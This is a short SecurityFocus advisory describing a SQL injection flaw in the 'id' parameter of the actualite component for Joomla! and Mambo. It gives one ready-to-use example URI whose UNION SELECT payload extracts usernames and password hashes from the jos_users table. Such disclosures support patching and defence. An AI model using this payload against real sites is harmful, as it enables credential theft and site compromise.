Joomla! and Mambo actualite Component 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),password),3,4,5,6,7,8,9%20from%20jos_users/*


 

Privacy Statement
Copyright 2010, SecurityFocus